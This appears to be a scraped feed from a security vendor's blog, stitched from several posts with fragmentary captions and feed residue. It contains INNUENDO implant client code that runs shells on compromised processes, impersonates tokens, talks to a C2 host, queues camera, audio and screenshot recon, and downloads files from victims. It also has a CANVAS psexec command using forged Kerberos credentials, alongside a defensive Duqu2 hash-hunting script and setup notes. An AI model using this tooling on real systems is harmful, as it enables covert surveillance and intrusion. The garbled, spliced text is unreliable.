'b': '|',\n                'c': '(',\n                'd': '<current date>',  # TODO\n                'e': '\\x27',\n                'f': ')',\n                'g': '>',\n                'h': '\\b',\n                'l': '<',\n                'n': ntpath.splitdrive(self.cwd)[0],\n                'p': self.cwd,\n                'q': '=',\n                's': ' ',\n                't': '<current time>',  # TODO\n                'v': self.ver,\n                '_': '\\n',\n                '$': '$',\n            }.get(code, ''))\n        return ''.join(result)\n\ndef main():\n    import argparse\n\n    parser = argparse.ArgumentParser(description=__doc__)\n    parser.add_argument('process_implant_id')\n    parser.add_argument('-c', '--command', help='execute a command then exit')\n    parser.add_argument('--no-cache', action='store_false', dest='cached',\n                        help='do not use cached data for initialization')\n    parser.add_argument('--token-user', help='attempt impersonation of a \"[domain\\\\]user\"')\n    parser.add_argument('--token-luid', help='sets a token LUID for impersonation')\n    parser.add_argument('-p', '--prompt', help='a windows prompt format string')\n    parser.add_argument('-u', '--url', help='rpc server url')\n\n    args = parser.parse_args()\n    proc_id = args.process_implant_id\n\n    c = rpc.Client(args.url)\n\n    try:\n        c.process_get(proc_id)\n    except rpc.RemoteError:\n        sys.exit('invalid target process')\n\n    if args.command:\n        shell = Shell(c, proc_id, args.token_user, args.token_luid)\n        oper_id = shell.execute(args.command)\n        shell.check_error(shell.wait(oper_id))\n        print shell.output(oper_id)\n        return\n\n    print 'initializing ...'\n    shell = Shell(c, proc_id, args.token_user, args.token_luid, args.prompt)\n    shell.setup(cached=args.cached)\n\n    # Enter REPL\n    shell.repl()\n\nif __name__ == '__main__':\n    try:\n        main()\n    except KeyboardInterrupt:\n        pass\n
\n>>> import pprint # to make it easier to look through results\n>>> import rpc\n>>> c = rpc.Client()\n>>> for event in c.events():\n... pprint.pprint(event)\nNone\n{'data': {'id': '...'},\n 'name': 'machine_updated',\n 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 890128)}\n{'data': {'id': '...'},\n 'name': 'node_updated',\n 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 927102)}\n{'data': {'id': '...'},\n 'name': 'process_updated',\n 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 957477)}\n
\nimport rpc\n\nclass Monitor(rpc.Client):\n    def on_some_event(self, event):\n        \"\"\"Called when \"some_event\" is emitted.\"\"\"\n        pass\n
\n\n    def monitor(self):\n        \"\"\"Monitors events for any existing event handlers.\"\"\"\n        # create an event filter based on the existing handlers\n        filter = [n[3:] for n in dir(self) if n.startswith('on_')]\n        print 'monitoring: {}'.format(', '.join(filter))\n\n        for event in self.events(*filter):\n            if not event: continue\n            handler = getattr(self, 'on_' + event['name'])\n            handler(event)\n
\nclass Monitor(rpc.Client):\n    # ... previous code ...\n    def on_process_added(self, event):\n        # all process events set event['data']['id'] to the relevant\n        # process ID\n        proc_id = event['data']['id']\n\n        # queue some recon operations\n        self.operation_execute('recon', 'assign_aliases', proc_id)\n        self.operation_execute('recon', 'audio_query', proc_id)\n        self.operation_execute('recon', 'camera_query', proc_id)\n
\nclass Monitor(rpc.Client):\n    # ... previous code ...\n    def on_operation_updated(self, event):\n        # all operation events set event['data']['id'] to the relevant\n        # operation ID\n        oper_id = event['data']['id']\n        # using the operation ID, we can retrieve the operation metadata\n        oper = self.operation_get(oper_id)\n\n        # and we can use the metadata to filter out operations that we're not\n        # interested in. In this case, operations that are not finished\n        if oper['state'] != 'finished':\n            return\n\n        # get operation attributes (these are the results)\n        attrs = self.operation_attributes(oper['id'])\n\n        # handle operation (if a matching 'handle_' method exists)\n        handler = getattr(self, 'handle_' + oper['name'], None)\n        if handler:\n            # pass in both the operation metadata and attributes\n            handler(oper, attrs)\n
\nimport rpc\n\nclass Monitor(rpc.Client):\n    # ... previous code ...\n    def handle_assign_aliases(self, oper, attrs):\n        # assign_aliases offers us a quick way to determine the target's\n        # architecture, among other useful bits of info\n        arch = attrs['info']['arch']\n\n        # let's tag it! tags belong to the process, so pass the process ID\n        # recorded in the operation metadata (not the operation ID)\n        self.process_tag_add('arch:{}'.format(arch), oper['process_id'])\n\n    def handle_camera_query(self, oper, attrs):\n        if attrs['cameras']:\n            self.process_tag_add('has:camera', oper['process_id'])\n        else:\n            # a camera could be removed, so we should be able to update\n            # the tag in that case\n            self.process_tag_remove('has:camera', oper['process_id'])\n\n    def handle_audio_query(self, oper, attrs):\n        if attrs['devices']:\n            self.process_tag_add('has:audio', oper['process_id'])\n        else:\n            # audio could be removed, so we should be able to update\n            # the tag in that case\n            self.process_tag_remove('has:audio', oper['process_id'])\n
\nimport rpc\n\nclass Monitor(rpc.Client):\n    ## operation result handlers ##\n\n    def handle_assign_aliases(self, oper, attrs):\n        arch = attrs['info']['arch']\n        self.process_tag_add('arch:{}'.format(arch), oper['process_id'])\n\n    def handle_camera_query(self, oper, attrs):\n        if attrs['cameras']:\n            self.process_tag_add('has:camera', oper['process_id'])\n        else:\n            self.process_tag_remove('has:camera', oper['process_id'])\n\n    def handle_audio_query(self, oper, attrs):\n        if attrs['devices']:\n            self.process_tag_add('has:audio', oper['process_id'])\n        else:\n            self.process_tag_remove('has:audio', oper['process_id'])\n\n    ## event handlers ##\n\n    def on_process_added(self, event):\n        proc_id = event['data']['id']\n\n        # queue some recon operations\n        self.operation_execute('recon', 'assign_aliases', proc_id)\n        self.operation_execute('recon', 'audio_query', proc_id)\n        self.operation_execute('recon', 'camera_query', proc_id)\n\n    def on_operation_updated(self, event):\n        oper_id = event['data']['id']\n        oper = self.operation_get(oper_id)\n\n        # filter\n        if oper['state'] != 'finished':\n            return\n\n        # get operation attributes\n        attrs = self.operation_attributes(oper['id'])\n\n        # handle operation\n        handler = getattr(self, 'handle_' + oper['name'], None)\n        if handler:\n            print 'handling operation:', oper['name']\n            handler(oper, attrs)\n\n    ## monitor ##\n\n    def monitor(self):\n        \"\"\"Monitors events for any existing event handlers.\"\"\"\n        # create an event filter based on the existing handlers\n        filter = [n[3:] for n in dir(self) if n.startswith('on_')]\n        print 'monitoring: {}'.format(', '.join(filter))\n\n        for event in self.events(*filter):\n            if not event: continue\n            print 'handling event:', event['name']\n            handler = getattr(self, 'on_' + event['name'])\n            handler(event)\n\nif __name__ == '__main__':\n    try:\n        Monitor().monitor()\n    except KeyboardInterrupt:\n        pass\n
\nI didn't realize that I had to blur this out so you stalkers couldn't find my house! Learn something new every day. |
Illustration 1: Word Macro-Enabled documents in legacy format and OOXML format |
\nWord version | 2007 | 2010 | 2013 | 2016\n
Security Warning | Yes | Yes | Yes | Yes\n
Security Alert Window | Yes | No | No | No\n
$ ./innuendo_client.py -u tcp://<c2-host>:9998 ping\nping?\npong!\n
\n>>> import innuendo_client\n
\n>>> from innuendo import rpc\n
\n>>> c = rpc.Client('tcp://<c2-host>:9998')\n>>> c.module_names()\n('exploitmanager', 'recon', ...)\n
\n>>> for event in c.events('process'):\n... proc_id = event['data']['id']\n... proc = c.process_get(proc_id)\n... print proc['name'], proc['machine_alias']\nnetclassmon.exe Windows-7-x64-fuzzybunny\nboot64.exe Windows-7-x64-wombat\nrundll32.exe Windows-XP-x86-cabbage\nboot64.exe Windows-7-x64-fuzzybunny\nboot32.exe Windows-XP-x86-cabbage\n
\n>>> for event in c.events('process_added'):\n... proc_id = event['data']['id']\n... c.operation_execute([proc_id], 'screengrab')\n
\n>>> import msgpack\n>>> res = c.operation_attributes(oper_id)\n>>> attrs = msgpack.unpackb(res)\n
\n>>> remote_path = attrs['data'][0]['path']\n
\n>>> import os\n>>> local_path = os.path.basename(remote_path)\n>>> with open(local_path, 'w+b') as file:\n...     for chunk in c.file_download(remote_path):\n...         file.write(chunk)\n
\nimport os\n\n# bootstrap the client environment\nimport innuendo_client\n\nimport msgpack\nfrom innuendo import rpc\n\ndef main():\n    print 'waiting'\n\n    c = rpc.Client()\n\n    # track the operations we want to watch\n    oper_ids = set()\n\n    for event in c.events('process_added', 'operation_updated'):\n        if not event:\n            # the server will send out \"heartbeat\" events periodically\n            # we can ignore them\n            continue\n\n        elif event['name'] == 'process_added':\n            print 'process_added: taking screenshot'\n\n            # grab the ID of the process that just activated\n            proc_id = event['data']['id']\n\n            # queue a screengrab operation and track its ID\n            res = c.operation_execute([proc_id], 'screengrab', wait=True)\n            oper_ids.add(res[0])\n\n            print 'operation_added:', res[0]\n\n        elif event['name'] == 'operation_updated':\n            # grab the ID of the operation that was just updated\n            oper_id = event['data']['id']\n\n            # make sure it's an operation we are tracking\n            if oper_id not in oper_ids:\n                continue\n\n            # get the operation data so we can check its state\n            oper = c.operation_get(oper_id)\n            print 'operation_updated:', oper['state']\n\n            # wait until the operation is finished\n            if oper['state'] != 'finished':\n                continue\n            oper_ids.remove(oper_id)\n\n            # grab and unpack the operation's attributes\n            res = c.operation_attributes(oper_id)\n            attrs = msgpack.unpackb(res)\n\n            # get the remote path of the first screenshot\n            remote_path = attrs['data'][0]['path']\n            local_path = os.path.basename(remote_path)\n\n            # stream the screenshot to a local file (binary mode: it is image data)\n            with open(local_path, 'w+b') as file:\n                for chunk in c.file_download(remote_path):\n                    file.write(chunk)\n            print 'saved:', local_path\n\nif __name__ == '__main__':\n    try:\n        main()\n    except KeyboardInterrupt:\n        pass\n
\nYou can make your maps in MS Paint or use Google Maps for high quality renditions. Or just start with a blank area (this still works). |
This is what it looks like when your whole organization just got compromised because you sat down at Starbucks for a second. |
One of these options is not like the other! Ok it is. Wait. |
---CUT HERE---\n
\n\n\n\n\n\n\n
import sys\nimport os\n\nif \".\" not in sys.path: sys.path.append(\".\")\nif \"../\" not in sys.path: sys.path.append(\"../\")\nif \"../../\" not in sys.path: sys.path.append(\"../../\")\nos.environ[\"DJANGO_SETTINGS_MODULE\"] = \"webapp.settings\"\n\nfrom home.models import binaries\n\nevil_md5 = [\n'14712103ddf9f6e77fa5c9a3288bd5ee',\n'e8eaec1f021a564b82b824af1dbe6c4d',\n'3fde1bbf3330e0bd0952077a390cef72',\n'2751e4b50a08eb11a84d03f8eb580a4e',\n'e8eaec1f021a564b82b824af1dbe6c4d',\n'520cd9ee4395ee85ccbe073a00649602',\n'acbf2d1f8a419528814b2efa9284ea8b',\n'a6b2ac3ee683be6fbbbab0fa12d88f73',\n'966953034b7d7501906d8b4cd3f90f6b',\n'4b26441166f23bcced22cc0f8588b3dd',\n'cf4a8212034fb2335dc069382fba1fb1',\n'050fbef5c814b2981fa61b7fc6820cbd',\n'0A566B1616C8AFEEF214372B1A0580C7',\n'0EECD17C6C215B358B7B872B74BFD800',\n'4541E850A228EB69FD0F0E924624B245',\n'94C4EF91DFCD0C53A96FDC387F9F9C35',\n'B4AC366E24204D821376653279CBAD86',\n'E8D6B4DADB96DDB58775E6C85B10B6CC',\n'0a566b1616c8afeef214372b1a0580c7',\n'94c4ef91dfcd0c53a96fdc387f9f9c35',\n'e8d6b4dadb96ddb58775e6c85b10b6cc',\n'b4ac366e24204d821376653279cbad86',\n'4541e850a228eb69fd0f0e924624b245',\n'0eecd17c6c215b358b7b872b74bfd800',\n'9749d38ae9b9ddd81b50aad679ee87ec',\n'3d83b077d32c422d6c7016b5083b9fc2',\n'C9A31EA148232B201FE7CB7DB5C75F5E',\n'9749d38ae9b9ddd81b50aad679ee87ec',\n'4c804ef67168e90da2c3da58b60c3d16',\n'856a13fcae0407d83499fc9c3dd791ba',\n'92aa68425401ffedcfba4235584ad487',\n'c9a31ea148232b201fe7cb7db5c75f5e',\n'f60968908f03372d586e71d87fe795cd',\n'3d83b077d32c422d6c7016b5083b9fc2',\n'bdb562994724a35a1ec5b9e85b8e054f',\n'164aa9cd56d900341535551464af43b7',\n'66a7e49ef0ebf10fb54621861c6dbfff',\n'dccffd4d2fc6a602bea8fdc1fa613dd4',\n'a0a976215f619a33bf7f52e85539a513',\n'a1d2a954388775513b3c7d95ab2c9067',\n'3B51F48378A26F664BF26B32496BD72A',\n'4c804ef67168e90da2c3da58b60c3d16',\n'f5ee03fed0133bb06d4cc52b0232fec0',\n'9a9e77d2b7792fbbddcd7ce05a4eb26e',\n\"107403e1259427355757b70b4d820997\",\n\"653e375d6455850fd76453dc5d71
3257\",\n\"c03ca7ea50a52e9e7d1f3ff17e68f7da\",\n\"45a7b2c4792803da5c79d61982e3ed38\",\n\"9fce104aab41e80236b073f4db54910d\",\n\"83b37e8df59051ee623da1c310fb4e8c\",\n\"8d80ba2dce3bd625babc25858b55375d\",\n\"af2b0ee182d9f48c293a80f762171d40\",\n\"4a9f5b4f549f43d4f96136c81a043631\",\n\"d4b3ef7b4d1c4b64c5146f02eab830a8\",\n\"ef460a40c5d399942ae32c23e63a8d10\",\n\"c80cd91848515b7973145a574440ca12\",\n\"9bc2aa9eb49c938eb47660b087654b9c\",\n\"75f0cda10d65f0865f92e9b7cd6a56de\",\n\"4e69bf01720ae8c13c48943d1f512d8e\",\n\"79fe76fc991a2f36e318c710e6684cca\",\n\"aa6fcf2594393784f4602f9d1d8cbaa0\",\n\"3af67c17dc76bcb7c7eb53b3e164a969\",\n\"e4bb017843c538cc821162a4ef64d833\",\n\"2684c847218745d2809d8c1c40588491\",\n\"7d6fe14a4817d1eae16b926cd6af00b4\",\n\"57090c92892406afe6207b6eefe44ce6\",\n\"a6fd9fc574c4a2b592c82892e5aff77d\",\n\"9daf29a0dd6eccec1093bef3fa3ec4f9\",\n\"45a416431dadda14361eff64fa52afde\",\n\"0c07e033975168de1ed461786a1bd4b7\",\n\"05cfbb2cef37ac1f3cded2a54663e0c4\",\n\"442d72f42e391c988e0fcda73488636a\",\n\"0e51ef79713229c6df6ed567214e4bcb\",\n\"ea05fd5e14bbb68be30d51d213f84f3d\",\n\"bcae43d8f2d4f5b67a84da218aeddd0e\",\n\"069701725a8fa9ab47a130e7e9879211\",\n\"6ab58775a586249dcc608efa47e5eabf\",\n\"9f5457c2514e3bcb61c4b6a14a507336\",\n\"941b051d857cdafb4c2d04f6246cd7ac\",\n\"d00fd4059c855d6c22a1d0a993d784af\",\n\"5ffbf53cc0fa2c61b1cd8d48a57d976a\",\n\"c81285c9763795df3b24ba1db002b352\",\n\"934d5d68f0632531844fcd9180fa65f2\",\n\"cee6703d62a6f334ecb9a43a2db904cd\",\n\"dd5013f4537e7dcf3579ab125bbb48e3\",\n\"4d8efdac702af5ff0c9edaad5401f567\",\n\"b507fac3b8b94f7b0c6aedafd3a72cbe\",\n\"d612393cda4228df8d43678171e273da\",\n\"9a11b52ceee6f2fb1fa7f4fb5fee3c49\",\n\"f4743b2df3c3e02dfbbd742475236033\",\n\"8d2421d5518c16e392fbe9e2ef88419d\",\n\"be04a3abec6f06761004053f13eed1b8\",\n\"e09bad51cf748abdc1913367770a7a83\",\n\"d5ce8c7456e444ef939a42be8e00a31c\",\n\"dbe43f68bfb0e670cdcb4ede143db1ef\",\n\"725b02ca7cfb061bfafccee3c15672c2\",\n\"cb5cf3dbcadc6bae90830a6735ac2419\",\n\"
8f8054da6c80a2785d8c913ba1ea0a64\",\n\"24ca17f51e73037aeb708ae96a4a939f\",\n\"f624119e06773f4c88607f46fae3ebba\",\n\"6edf091a408c33d7e9dd1e0341a3e19e\",\n\"0d63aadacfdd57754b903af3a60627b8\",\n\"2d54a71c7d4cd203dbdfcecd7329fc23\",\n\"d1ec90731409c24c8fbdc5d1b39703bc\",\n\"147126b7328ac42b0bfd6470ef809360\",\n\"39b36b47e7afd8d7866ffe6466b2eb0a\",\n\"2cf6ee0a02b34d2257d92b4c1501d61e\",\n\"0d7156f407f57f92ba3aaa19bc3ef304\",\n\"9e2add724fbe409429bdb0e212cdcc5e\",\n\"f2e5987ab9db1c2f79a298636e1a87d2\",\n\"f3d2dfa10cf1c7fc07bc76be98c1c008\",\n\"52944779ddbbb31db9730b9971aeda06\",\n\"6f967c2029844a9ba85de9fcb2c02b62\",\n\"427168da8d933e125e43c50060d8ddd8\",\n\"4bc2f1fa6d3bd027157f8b74dcee1910\",\n\"2aedf87c810d05796cac4f8f92ffe9f0\",\n\"0a9c596cace74595abbc630600c16827\",\n\"5b64ea57526948dc9d2f9b59ead21181\",\n\"13eaed09d79557b95daf74c845f2b957\",\n\"8c52ffd05e83528cabae0ebd2e22b4f0\",\n\"c96b80c1faa5986e5185ca0f1eefe7e4\",\n\"de8eaa4b7960cc99b63eb0d4fef6b02b\",\n\"b2f46de730bdd975094890dbea10184c\",\n\"390d3abb7e34470a788b8972630d8583\",\n\"823431ce0530d924fb96d3ca72685b07\",\n\"f2c520cf776a69cf03bbfb4965de569f\",\n\"efb33147c3ba73e1dd0ce6665a3257e4\",\n\"9f430a2a8f74d37b5f488fb1eb001222\",\n\"7a3041f198e1678c77efb3e8d628b6dd\",\n\"2137d67f22aae1dc4b88f6d3269e991d\",\n\"fb367a128574cb35c29099ebcec4635c\",\n\"53a94a60f56591042c597b0078b127f9\",\n\"1f17e12478cbec4e602426e37ab850bc\",\n\"7b99589452f1852ec24d9a2320e18ddc\",\n\"8dc6da7c18a59775ecd6522b5a4300b3\",\n\"4623ac239145f8c8a1c4ab39f6bee2b0\",\n\"9b13e9893cd890c6ac58b094582c2f82\",\n\"01ee87ba582da9c38b1e9c27e97d9d2c\",\n\"6ca125f46d1b443eca20574dd8695fba\",\n\"9cf0bf3d7a4f9655205b3cc1a50fe1e7\",\n]\n\n# normalise case before comparing: the list above mixes upper- and lower-case digests\nbinaries_hashes = set(b.binary_md5.lower() for b in binaries.objects.all() if b.binary_md5)\nfiltered_hashes = set(h.lower() for h in evil_md5)\nprint 'Found %d binaries' % len(binaries_hashes)\nprint 'Testing against %d Duqu md5 hashes' % len(filtered_hashes)\n\nfor md5_hash in sorted(filtered_hashes):\n    if md5_hash in binaries_hashes:\n        print 'Found hash %s' % md5_hash\n\n\n"],"link":["https://immunityproducts.blogspot.com/2015/06/look-for-duqu2-across-all-time-and-space.html"],"author":["noreply@blogger.com (Dave Aitel)"],"thr:total":["0"],"text_description":"If you are running El Jefe then you can just use the below script to test for any possible Duqu2 infections that have occurred across your network for all time (assuming they didn't recompile specifically for you, which is very possible).\n\nAny user of El Jefe can run this script by putting it inside the eljefe/webapp/scripts folder. Of course, if you get a hit, you can examine the machines that were infected much more closely in the GUI itself.\n\nHappy \"Hunting\" :)\n\n\n\n\n\n\n\n---CUT HERE---\n\n\n\n\n\n\n\nimport sys\nimport os\n\nif \".\" not in sys.path: sys.path.append(\".\")\nif \"../\" not in sys.path: sys.path.append(\"../\")\nif \"../../\" not in sys.path: sys.path.append(\"../../\")\nos.environ[\"DJANGO_SETTINGS_MODULE\"] = \"webapp.settings\"\n\nfrom home.models import binaries\n\nevil_md5 = 
[\n'14712103ddf9f6e77fa5c9a3288bd5ee',\n'e8eaec1f021a564b82b824af1dbe6c4d',\n'3fde1bbf3330e0bd0952077a390cef72',\n'2751e4b50a08eb11a84d03f8eb580a4e',\n'e8eaec1f021a564b82b824af1dbe6c4d',\n'520cd9ee4395ee85ccbe073a00649602',\n'acbf2d1f8a419528814b2efa9284ea8b',\n'a6b2ac3ee683be6fbbbab0fa12d88f73',\n'966953034b7d7501906d8b4cd3f90f6b',\n'4b26441166f23bcced22cc0f8588b3dd',\n'cf4a8212034fb2335dc069382fba1fb1',\n'050fbef5c814b2981fa61b7fc6820cbd',\n'0A566B1616C8AFEEF214372B1A0580C7',\n'0EECD17C6C215B358B7B872B74BFD800',\n'4541E850A228EB69FD0F0E924624B245',\n'94C4EF91DFCD0C53A96FDC387F9F9C35',\n'B4AC366E24204D821376653279CBAD86',\n'E8D6B4DADB96DDB58775E6C85B10B6CC',\n'0a566b1616c8afeef214372b1a0580c7',\n'94c4ef91dfcd0c53a96fdc387f9f9c35',\n'e8d6b4dadb96ddb58775e6c85b10b6cc',\n'b4ac366e24204d821376653279cbad86',\n'4541e850a228eb69fd0f0e924624b245',\n'0eecd17c6c215b358b7b872b74bfd800',\n'9749d38ae9b9ddd81b50aad679ee87ec',\n'3d83b077d32c422d6c7016b5083b9fc2',\n'C9A31EA148232B201FE7CB7DB5C75F5E',\n'9749d38ae9b9ddd81b50aad679ee87ec',\n'4c804ef67168e90da2c3da58b60c3d16',\n'856a13fcae0407d83499fc9c3dd791ba',\n'92aa68425401ffedcfba4235584ad487',\n'c9a31ea148232b201fe7cb7db5c75f5e',\n'f60968908f03372d586e71d87fe795cd',\n'3d83b077d32c422d6c7016b5083b9fc2',\n'bdb562994724a35a1ec5b9e85b8e054f',\n'164aa9cd56d900341535551464af43b7',\n'66a7e49ef0ebf10fb54621861c6dbfff',\n'dccffd4d2fc6a602bea8fdc1fa613dd4',\n'a0a976215f619a33bf7f52e85539a513',\n'a1d2a954388775513b3c7d95ab2c9067',\n'3B51F48378A26F664BF26B32496BD72A',\n'4c804ef67168e90da2c3da58b60c3d16',\n'f5ee03fed0133bb06d4cc52b0232fec0',\n'9a9e77d2b7792fbbddcd7ce05a4eb26e',\n\"107403e1259427355757b70b4d820997\",\n\"653e375d6455850fd76453dc5d713257\",\n\"c03ca7ea50a52e9e7d1f3ff17e68f7da\",\n\"45a7b2c4792803da5c79d61982e3ed38\",\n\"9fce104aab41e80236b073f4db54910d\",\n\"83b37e8df59051ee623da1c310fb4e8c\",\n\"8d80ba2dce3bd625babc25858b55375d\",\n\"af2b0ee182d9f48c293a80f762171d40\",\n\"4a9f5b4f549f43d4f96136c81a043631\",\n\"d4b3ef7b4d1c4b64
c5146f02eab830a8\",\n\"ef460a40c5d399942ae32c23e63a8d10\",\n\"c80cd91848515b7973145a574440ca12\",\n\"9bc2aa9eb49c938eb47660b087654b9c\",\n\"75f0cda10d65f0865f92e9b7cd6a56de\",\n\"4e69bf01720ae8c13c48943d1f512d8e\",\n\"79fe76fc991a2f36e318c710e6684cca\",\n\"aa6fcf2594393784f4602f9d1d8cbaa0\",\n\"3af67c17dc76bcb7c7eb53b3e164a969\",\n\"e4bb017843c538cc821162a4ef64d833\",\n\"2684c847218745d2809d8c1c40588491\",\n\"7d6fe14a4817d1eae16b926cd6af00b4\",\n\"57090c92892406afe6207b6eefe44ce6\",\n\"a6fd9fc574c4a2b592c82892e5aff77d\",\n\"9daf29a0dd6eccec1093bef3fa3ec4f9\",\n\"45a416431dadda14361eff64fa52afde\",\n\"0c07e033975168de1ed461786a1bd4b7\",\n\"05cfbb2cef37ac1f3cded2a54663e0c4\",\n\"442d72f42e391c988e0fcda73488636a\",\n\"0e51ef79713229c6df6ed567214e4bcb\",\n\"ea05fd5e14bbb68be30d51d213f84f3d\",\n\"bcae43d8f2d4f5b67a84da218aeddd0e\",\n\"069701725a8fa9ab47a130e7e9879211\",\n\"6ab58775a586249dcc608efa47e5eabf\",\n\"9f5457c2514e3bcb61c4b6a14a507336\",\n\"941b051d857cdafb4c2d04f6246cd7ac\",\n\"d00fd4059c855d6c22a1d0a993d784af\",\n\"5ffbf53cc0fa2c61b1cd8d48a57d976a\",\n\"c81285c9763795df3b24ba1db002b352\",\n\"934d5d68f0632531844fcd9180fa65f2\",\n\"cee6703d62a6f334ecb9a43a2db904cd\",\n\"dd5013f4537e7dcf3579ab125bbb48e3\",\n\"4d8efdac702af5ff0c9edaad5401f567\",\n\"b507fac3b8b94f7b0c6aedafd3a72cbe\",\n\"d612393cda4228df8d43678171e273da\",\n\"9a11b52ceee6f2fb1fa7f4fb5fee3c49\",\n\"f4743b2df3c3e02dfbbd742475236033\",\n\"8d2421d5518c16e392fbe9e2ef88419d\",\n\"be04a3abec6f06761004053f13eed1b8\",\n\"e09bad51cf748abdc1913367770a7a83\",\n\"d5ce8c7456e444ef939a42be8e00a31c\",\n\"dbe43f68bfb0e670cdcb4ede143db1ef\",\n\"725b02ca7cfb061bfafccee3c15672c2\",\n\"cb5cf3dbcadc6bae90830a6735ac2419\",\n\"8f8054da6c80a2785d8c913ba1ea0a64\",\n\"24ca17f51e73037aeb708ae96a4a939f\",\n\"f624119e06773f4c88607f46fae3ebba\",\n\"6edf091a408c33d7e9dd1e0341a3e19e\",\n\"0d63aadacfdd57754b903af3a60627b8\",\n\"2d54a71c7d4cd203dbdfcecd7329fc23\",\n\"d1ec90731409c24c8fbdc5d1b39703bc\",\n\"147126b7328ac42b0bfd6470ef8
09360\",\n\"39b36b47e7afd8d7866ffe6466b2eb0a\",\n\"2cf6ee0a02b34d2257d92b4c1501d61e\",\n\"0d7156f407f57f92ba3aaa19bc3ef304\",\n\"9e2add724fbe409429bdb0e212cdcc5e\",\n\"f2e5987ab9db1c2f79a298636e1a87d2\",\n\"f3d2dfa10cf1c7fc07bc76be98c1c008\",\n\"52944779ddbbb31db9730b9971aeda06\",\n\"6f967c2029844a9ba85de9fcb2c02b62\",\n\"427168da8d933e125e43c50060d8ddd8\",\n\"4bc2f1fa6d3bd027157f8b74dcee1910\",\n\"2aedf87c810d05796cac4f8f92ffe9f0\",\n\"0a9c596cace74595abbc630600c16827\",\n\"5b64ea57526948dc9d2f9b59ead21181\",\n\"13eaed09d79557b95daf74c845f2b957\",\n\"8c52ffd05e83528cabae0ebd2e22b4f0\",\n\"c96b80c1faa5986e5185ca0f1eefe7e4\",\n\"de8eaa4b7960cc99b63eb0d4fef6b02b\",\n\"b2f46de730bdd975094890dbea10184c\",\n\"390d3abb7e34470a788b8972630d8583\",\n\"823431ce0530d924fb96d3ca72685b07\",\n\"f2c520cf776a69cf03bbfb4965de569f\",\n\"efb33147c3ba73e1dd0ce6665a3257e4\",\n\"9f430a2a8f74d37b5f488fb1eb001222\",\n\"7a3041f198e1678c77efb3e8d628b6dd\",\n\"2137d67f22aae1dc4b88f6d3269e991d\",\n\"fb367a128574cb35c29099ebcec4635c\",\n\"53a94a60f56591042c597b0078b127f9\",\n\"1f17e12478cbec4e602426e37ab850bc\",\n\"7b99589452f1852ec24d9a2320e18ddc\",\n\"8dc6da7c18a59775ecd6522b5a4300b3\",\n\"4623ac239145f8c8a1c4ab39f6bee2b0\",\n\"9b13e9893cd890c6ac58b094582c2f82\",\n\"01ee87ba582da9c38b1e9c27e97d9d2c\",\n\"6ca125f46d1b443eca20574dd8695fba\",\n\"9cf0bf3d7a4f9655205b3cc1a50fe1e7\",\n]\n\nbinaries_hashes = set([b.binary_md5 for b in binaries.objects.all()])\nfiltered_hashes = list(set(evil_md5))\nprint 'Found %d binaries' % len(binaries_hashes)\nprint 'Tesing against %d duqu md5 hashes' % len(filtered_hashes)\n\nfor md5_hash in list(set(filtered_hashes)):\n if md5_hash in binaries_hashes:\n print 'Found hash %s' % md5_hash\n\n\n"},{"guid":[{"_":"tag:blogger.com,1999:blog-7337853103195839314.post-7213695399783019028","$":{"isPermaLink":"false"}}],"pubDate":["Fri, 06 Mar 2015 14:22:00 
+0000"],"atom:updated":["2015-03-06T06:52:18.073-08:00"],"category":[{"_":"CANVAS","$":{"domain":"http://www.blogger.com/atom/ns#"}}],"title":["CANVAS - Psexec & Kerberos credentials"],"description":["
Computing the NTLM hash |
Using the NTLM hash in the CLI |
Artificially generating a Kerberos TGT |
Using a Kerberos credential file to compromise the target |
Target is owned! |
$ python exploits/psexec/psexec.py -t 192.168.0.1 -p 445 -Ocmd:\"mybinary mybinaryargument\" -Ouser:administrator -Odomain:IMMU2.COM -Okrb5_ccache:/tmp/krb5cc_1000 -Olocal_upl:/tmp/BABAR -Oremote_path_upl:\"C:\\\\\"\n
Ticket is extracted and saved (oops small typo in the module code :P) |
The previous relative path is specified (although cut by the GUI here) |
USB Relationship Map |
This Huawei 3G Modem has been used on two workstations. Why are we even using Huawei modems?!? |
This list of USB devices on the endpoints has beautiful Christmas colors. |
Event view |
BKav identifies the binary as a KeyLogger |
ExecutionFilter will be triggered when a binary filepath is on our blacklist |
A simple action that will print the username, ip and binary executed |
Adding a working filter |
Gotcha! You should never do your math homework on a compromised machine! |
Configure a remote Sandbox Virtual Machine |
Select the right Sandbox Virtual Machine to run your sample |
Integration with CAMAL |
Set-up your client completely from the WebUI |
sha1sum: b8ee361ecf67e76ec0888e570153f76b15dfcea5 eljefe2.1.release.tar.gz\n
$ sudo apt-get install python python-sqlalchemy python-bson python-pip libcap2-bin\n $ sudo pip install sqlalchemy bson Django\n
$ sudo setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
\n$ getcap /usr/sbin/tcpdump\n /usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip\n
$ sudo adduser cuckoo
\niptables -A FORWARD -o eth0 -i vboxnet0 -s 192.168.56.0/24 -m conntrack --ctstate NEW -j ACCEPT\niptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT\niptables -A POSTROUTING -t nat -j MASQUERADE\nsysctl -w net.ipv4.ip_forward=1\n
Walking through the events on multiple stations |
Process Usage: An easy way to identify process used only a small amount of time |
Analyzing triggered events over time |
Event Inspection |
Things I observed\n
- Let me define booth babes as someone you short-term hire specifically to work your booth to attract people's attention based on their looks. I only saw one vendor, ironically an educational vendor, who had staff that fit this description.\n\n
- I made it a point to talk to some women who came through our booth about booth babes and I found some very different definitions as to what would qualify someone. The most liberal definition was the babe in question could be a full time employee but if they got especially \"tarted up\" for their booth time then they qualified. By this definition there appeared to be significantly more booth babes in attendance. \n\n
- One vendor who put up an enormous booth near the front had, and I'm not kidding, a grandpa doing a magic show. Later their PR person came over and introduced himself scouting for business. I wish I had the presence of mind to ask how that decision happened.\n\n
- Did Randy Couture count as a male booth babe or as a celebrity endorsement? If he is a booth babe he's the only one who can easily get me in a rear naked choke, so he's whatever he wants to be.\n\n
Things we Learned\n
- The big buzzword this year was \"managed\", manage your VPNs, manage your logs, manage your certificates, manage your ssh keys (?!), manage your life! \n\n
- Nico and I both walked around and didn't see any new products that blew our minds.\n\n
- Immunity went with no dedicated sales staff and I think it worked out well. People were pretty surprised when they talked to someone who knew what was going on with their product. Is it worth taking technical people off of other projects to staff a booth? I think regarding reputation it probably is, regarding revenue still remains to be seen.\n\n
